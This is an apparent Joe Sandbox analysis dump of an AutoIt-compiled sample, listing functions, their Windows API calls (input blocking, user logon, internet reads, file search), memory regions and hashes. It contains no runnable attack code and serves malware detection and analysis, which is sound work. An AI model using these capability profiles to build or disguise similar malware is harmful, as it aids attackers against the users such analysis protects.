                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: FileFind$AttributesCloseFirst
                                                                        • String ID:
                                                                        • API String ID: 48322524-0
                                                                        • Opcode ID: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                                                        • Instruction ID: b419dbaef297d354eb99830e4178f101d1a7f75c7260f3cbf0392e7d05c3e8e7
                                                                        • Opcode Fuzzy Hash: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                                                        • Instruction Fuzzy Hash: 22E092328145189B8610AA78AC0D4EE779CDF0A236F100B56FE38C21E0D7B49A9047DA
                                                                        Function 004422FE Relevance: 3.1, APIs: 2, Instructions: 89networkfileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0044231E
                                                                        • InternetReadFile.WININET(?,00000000,?,?), ref: 00442356
                                                                          • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Internet$AvailableDataErrorFileLastQueryRead
                                                                        • String ID:
                                                                        • API String ID: 901099227-0
                                                                        • Opcode ID: b48fbef154557e42056369557a390c5e15e1cd9efc8ac9760c34eb316c367bda
                                                                        • Instruction ID: 2cb050104b41b6b223ad4d4b8d529f91c68f3ac810c45c6f1fc1690b5501c343
                                                                        • Opcode Fuzzy Hash: b48fbef154557e42056369557a390c5e15e1cd9efc8ac9760c34eb316c367bda
                                                                        • Instruction Fuzzy Hash: B32174752002047BFB10DE26DC41FAB73A8EB54765F40C42BFE059A141D6B8E5458BA5
                                                                        Function 0047EA6F Relevance: 2.0, APIs: 1, Instructions: 502COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • DefDlgProcW.USER32(?,?,?,?), ref: 0047EA9E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Proc
                                                                        • String ID:
                                                                        • API String ID: 2346855178-0
                                                                        • Opcode ID: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                                                                        • Instruction ID: f892bfb12232205f5f58103f0897237a3558493ed3735c4837d976d353c396a9
                                                                        • Opcode Fuzzy Hash: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                                                                        • Instruction Fuzzy Hash: 82B1167330C1182DF218A6AABC81EFF679CD7C5779B10863FF248C55C2D62B5821A1B9
                                                                        Function 0045A370 Relevance: 1.5, APIs: 1, Instructions: 24keyboardCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • BlockInput.USER32(00000001), ref: 0045A38B
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: BlockInput
                                                                        • String ID:
                                                                        • API String ID: 3456056419-0
                                                                        • Opcode ID: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                                                                        • Instruction ID: ec784d9e1adcb2c5bdb0852901797f150ca91aa996cd98963819779bf85d9a24
                                                                        • Opcode Fuzzy Hash: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                                                                        • Instruction Fuzzy Hash: D8E0DF352002029FC300EF66C84495AB7E8EF94368F10883EFD45D7341EA74E80087A6
                                                                        Function 00436CD7 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 00436CF9
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: LogonUser
                                                                        • String ID:
                                                                        • API String ID: 1244722697-0
                                                                        • Opcode ID: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                                                                        • Instruction ID: 7208d1371e48addad7a82bf776aec5a394cd9d1c10cc53d221989696c058f8f6
                                                                        • Opcode Fuzzy Hash: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                                                                        • Instruction Fuzzy Hash: 4DE0ECB626460EAFDB04CF68DC42EBF37ADA749710F004618BA16D7280C670E911CA74
                                                                        Function 00472C3F Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetUserNameW.ADVAPI32(?,?), ref: 00472C51
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: NameUser
                                                                        • String ID:
                                                                        • API String ID: 2645101109-0
                                                                        • Opcode ID: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                                                                        • Instruction ID: cbdb53fe1e94bfc77c89611ca4b62432a5518fa0aa6a76fb1323f8d63e00c007
                                                                        • Opcode Fuzzy Hash: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                                                                        • Instruction Fuzzy Hash: C3C04CB5004008EBDB148F50D9889D93B78BB04340F108199B60E95040D7B496C9DBA5
                                                                        Function 0041F250 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SetUnhandledExceptionFilter.KERNEL32(Function_0001F20E), ref: 0041F255
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: ExceptionFilterUnhandled
                                                                        • String ID:
                                                                        • API String ID: 3192549508-0
                                                                        • Opcode ID: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                                                                        • Instruction ID: fb0c5f5a3ae0de1c345b26270a1521b23addb5e119a177cdcf8b78f668196b28
                                                                        • Opcode Fuzzy Hash: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                                                                        • Instruction Fuzzy Hash: 8190027625150157470417705E1964925905B5960275108BA6D11C8564DAA98089A619
                                                                        Function 0042200C Relevance: 1.4, Strings: 1, Instructions: 180COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: N@
                                                                        • API String ID: 0-1509896676
                                                                        • Opcode ID: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                                                        • Instruction ID: 433aa61276291b0397d7e0efaabfbd78b7095b9e612e68cb1662ee3b8c9c8781
                                                                        • Opcode Fuzzy Hash: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                                                        • Instruction Fuzzy Hash: 48618E71A003259FCB18CF48D584AAEBBF2FF84310F5AC1AED9095B361C7B59955CB88
                                                                        Function 0040FA10 Relevance: .6, Instructions: 607COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                                                        • Instruction ID: 421b1f2eadcb2952f8febc08502f38db6b120a980ad90a3a21cdce547adf9c29
                                                                        • Opcode Fuzzy Hash: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                                                        • Instruction Fuzzy Hash: 132270B7E5151A9BDB08CE95CC415D9B3A3BBC832471F9129D819E7305EE78BA078BC0
                                                                        Function 004129D0 Relevance: .4, Instructions: 355COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                                        • Instruction ID: 2bcfc4213c201322ab01e918109ed7ba488288358e1fe6702c600853dbf8b640
                                                                        • Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                                        • Instruction Fuzzy Hash: 9CC1B473D0E6B3058B35466D45182BFFE626E91B8031FC392DDD03F399C22AADA196D4
                                                                        Function 004125E8 Relevance: .3, Instructions: 349COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                                        • Instruction ID: 7014f9c6c4bb04029b5f83a2624c32223adacf072d8c068e18a9ecb8bc3ae66d
                                                                        • Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                                        • Instruction Fuzzy Hash: 04C1A473D1A6B2058B36476D05182BFFE626E91B8031FC3D6CCD03F299C22AAD9596D4
                                                                        Function 00412216 Relevance: .3, Instructions: 332COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                                        • Instruction ID: 878ae001d8650add2b069b622ec184fb54f95ec25c04ba16196e518284591b6f
                                                                        • Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                                        • Instruction Fuzzy Hash: FBC19473D0A6B2068B36476D05582BFFE626E91B8131FC3D2CCD03F299C22AAD9595D4
                                                                        Function 004594E9 Relevance: 79.2, APIs: 41, Strings: 4, Instructions: 490filewindowcomCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • DeleteObject.GDI32(?), ref: 0045953B
                                                                        • DeleteObject.GDI32(?), ref: 00459551
                                                                        • DestroyWindow.USER32(?), ref: 00459563
                                                                        • GetDesktopWindow.USER32 ref: 00459581
                                                                        • GetWindowRect.USER32(00000000), ref: 00459588
                                                                        • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0045969E
                                                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 004596AC
                                                                        • CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,00000002,00000007,?,?,?,00000000,00000000), ref: 004596E8
                                                                        • GetClientRect.USER32(00000000,?), ref: 004596F8
                                                                        • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 0045973B
                                                                        • CreateFileW.KERNEL32(00000000,000001F4,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00459760
                                                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 0045977B
                                                                        • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00459786
                                                                        • GlobalLock.KERNEL32(00000000), ref: 0045978F
                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0045979E
                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 004597A5
                                                                        • CloseHandle.KERNEL32(00000000), ref: 004597AC
                                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,000001F4), ref: 004597B9
                                                                        • OleLoadPicture.OLEAUT32(000001F4,00000000,00000000,004829F8,00000000), ref: 004597D0
                                                                        • GlobalFree.KERNEL32(00000000), ref: 004597E2
                                                                        • CopyImage.USER32(50000001,00000000,00000000,00000000,00002000), ref: 0045980E
                                                                        • SendMessageW.USER32(00000000,00000172,00000000,50000001), ref: 00459831
                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020), ref: 00459857
                                                                        • ShowWindow.USER32(?,00000004), ref: 00459865
                                                                        • CreateWindowExW.USER32(00000000,static,00000000,000001F4,50000001,0000000B,0000000B,?,?,?,00000000,00000000), ref: 004598AF
                                                                        • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004598C3
                                                                        • GetStockObject.GDI32(00000011), ref: 004598CD
                                                                        • SelectObject.GDI32(00000000,00000000), ref: 004598D5
                                                                        • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004598E5
                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004598EE
                                                                        • DeleteDC.GDI32(00000000), ref: 004598F8
                                                                        • _wcslen.LIBCMT ref: 00459916
                                                                        • _wcscpy.LIBCMT ref: 0045993A
                                                                        • CreateFontW.GDI32(?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004599DB
                                                                        • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 004599EF
                                                                        • GetDC.USER32(00000000), ref: 004599FC
                                                                        • SelectObject.GDI32(00000000,?), ref: 00459A0C
                                                                        • SelectObject.GDI32(00000000,00000007), ref: 00459A37
                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00459A42
                                                                        • MoveWindow.USER32(00000000,0000000B,?,?,00000190,00000001), ref: 00459A5F
                                                                        • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00459A6D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
                                                                        • String ID: $AutoIt v3$DISPLAY$static
                                                                        • API String ID: 4040870279-2373415609
                                                                        • Opcode ID: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                                                        • Instruction ID: 0470743097681e939cd033c9659fc80dd101af82a4c7fdd8c03ae3a829a790b9
                                                                        • Opcode Fuzzy Hash: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                                                        • Instruction Fuzzy Hash: 92027D71600204EFDB14DF64CD89FAE7BB9BB48305F108569FA05AB292D7B4ED05CB68
                                                                        Function 004417BF Relevance: 49.8, APIs: 33, Instructions: 275COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetSysColor.USER32(00000012), ref: 0044181E
                                                                        • SetTextColor.GDI32(?,?), ref: 00441826
                                                                        • GetSysColorBrush.USER32(0000000F), ref: 0044183D
                                                                        • GetSysColor.USER32(0000000F), ref: 00441849
                                                                        • SetBkColor.GDI32(?,?), ref: 00441864
                                                                        • SelectObject.GDI32(?,?), ref: 00441874
                                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 004418AA
                                                                        • GetSysColor.USER32(00000010), ref: 004418B2
                                                                        • CreateSolidBrush.GDI32(00000000), ref: 004418B9
                                                                        • FrameRect.USER32(?,?,00000000), ref: 004418CA
                                                                        • DeleteObject.GDI32(?), ref: 004418D5
                                                                        • InflateRect.USER32(?,000000FE,000000FE), ref: 0044192F
                                                                        • FillRect.USER32(?,?,?), ref: 00441970
                                                                          • Part of subcall function 004308EF: GetSysColor.USER32(0000000E), ref: 00430913
                                                                          • Part of subcall function 004308EF: SetTextColor.GDI32(?,00000000), ref: 0043091B
                                                                          • Part of subcall function 004308EF: GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                                                          • Part of subcall function 004308EF: GetSysColor.USER32(0000000F), ref: 00430959
                                                                          • Part of subcall function 004308EF: GetSysColor.USER32(00000011), ref: 00430979
                                                                          • Part of subcall function 004308EF: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                                                          • Part of subcall function 004308EF: SelectObject.GDI32(?,00000000), ref: 0043099C
                                                                          • Part of subcall function 004308EF: SetBkColor.GDI32(?,?), ref: 004309A6
                                                                          • Part of subcall function 004308EF: SelectObject.GDI32(?,?), ref: 004309B4
                                                                          • Part of subcall function 004308EF: InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                                                          • Part of subcall function 004308EF: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                                                          • Part of subcall function 004308EF: GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                                                          • Part of subcall function 004308EF: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
